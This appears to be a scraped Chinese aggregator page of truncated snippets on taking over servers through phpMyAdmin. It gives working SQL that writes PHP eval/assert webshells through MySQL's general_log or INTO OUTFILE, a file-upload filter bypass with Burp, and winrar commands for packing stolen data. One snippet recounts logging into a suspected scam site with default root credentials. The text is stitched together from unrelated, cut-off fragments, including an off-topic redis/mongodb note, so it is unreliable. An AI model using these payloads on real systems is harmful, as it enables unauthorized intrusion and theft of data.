废话: 1.听说网上卖手机的网站很多是诈骗的,搜到一个499元货到付款的手机网站.有点像诈骗,但倒觉得他是在收集用户信息 2.把网站扔到御剑,搜到phpmyadmin的后台,试试下账号密码居然都是默认的(root  root)  省得爆破了 步骤: 1.  2. 3.…

1.我们先建立一个简单的一句话木马文件,我们这里就命名为shell2吧. 2.因为提交的文件可能是有过滤的,我们这个靶场的这个题目就是禁止上传危险的文件类型,如jsp jar war等,所以就需要绕过过滤检测.我们这里用的方法是先将一句话木马重命名改成jpg格式,试了下jpg图片可上传.3.开启bp抓包,设置好代理后开始拦截.bp拦截开启后,回到网页,提交刚才改好的jpg文件,然后我们就可以看到成功拦截到包.上图可看到我们的包已经拦截下来. 4.然后我们将jpg后缀改回php后缀,让一句话木马变…

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句 所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell 进入phpMyAdmin后在SQL处执行SQL语句 首先查看general log是否开启 show variables like 'general_log'; general log是关闭状态,执行SQL语句开启general log set g…

思路:就是利用mysql的一个日志文件.这个日志文件每执行一个sql语句就会将其执行的保存.我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令.然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修改. set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmd.php'; SELECT '<?php assert($_POST[&qu…

redis和mongodb我之所见 最近自己在做一些个人的小创作.小项目,其中用到了mongodb和redis,最初可能对这二者没有深入的认识.都是所谓的“非关系型数据库”,有什么区别么? 实际上,在我看来,redis的角色更接近于memcache,而mongodb是一个真正的数据库. redis是一个key-value型数据库,信息以键对应值的关系存储在内存中,比memcache较大的优势就在于其数据结构的多样性. 说它不算一个真正意义上的数据库,因为redis是主要把数据存储在内存中(当然可…

0X001 适用场景 1.获取了Mysql数据库root账号以及密码. 2.可以访问3306端口以及数据库. 0X002 扫描获取root账号的密码 通常有下面一些方法来获取root账号的密码 (1)phpMyAdmin多线程批量破解工具,下载地址:http://www.test404.com/post-546.html http://pan.baidu.com/s/1c1LD6co,通过收集phpmyadmin地址进行暴力破解. (2)代码泄露获取数据库账号和密码 (3)文件包含读取配置文件中…

[PhpMyAdmin后台拿Shell]CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');select xiaoma1 from xiaoma INTO OUTFILE 'E:/wamp/www/7.php';以上同时执行,在数据库: mysql 下创建一个表名为:xi…

SHELL下打包文件 在我们拿下webshell的时候,想要获取数据或者源码往往会用菜刀或者蚁剑去打包,但是这个时候往往就会出现很多问题,列如打包失败,或者是打包得不完整等等. 这个时候如果对方是windows服务器的话,我们可以将我们本地装的winrar.exe上传过去 压缩盘下的dat文件夹,并且命名为bat.rar winrar.exe a -ag -k -r -s -ibck c:/bak.rar c:/dat/ 压缩多个文件 winrar a -ag -ibck bak.rar fil…

Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP.和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版<网络攻防实战研究——漏洞利用与提权>,但技术的进步有无止境,思想有多远,路就…

来自:http://blog.51cto.com/simeon/1981572 作者介绍 陈小兵,高级工程师,具有丰富的信息系统项目经验及18年以上网络安全经验,现主要从事网络安全及数据库技术研究工作.<黑客攻防及实战案例解析><Web渗透及实战案例解析><安全之路-Web渗透及实战案例解析第二版><黑客攻防实战加密与解密><网络攻防实战研究:漏洞利用与提权>作者,在国内多本学术期刊发表论文20余篇,并在多本IT杂志发表文章100余篇. 在针对网…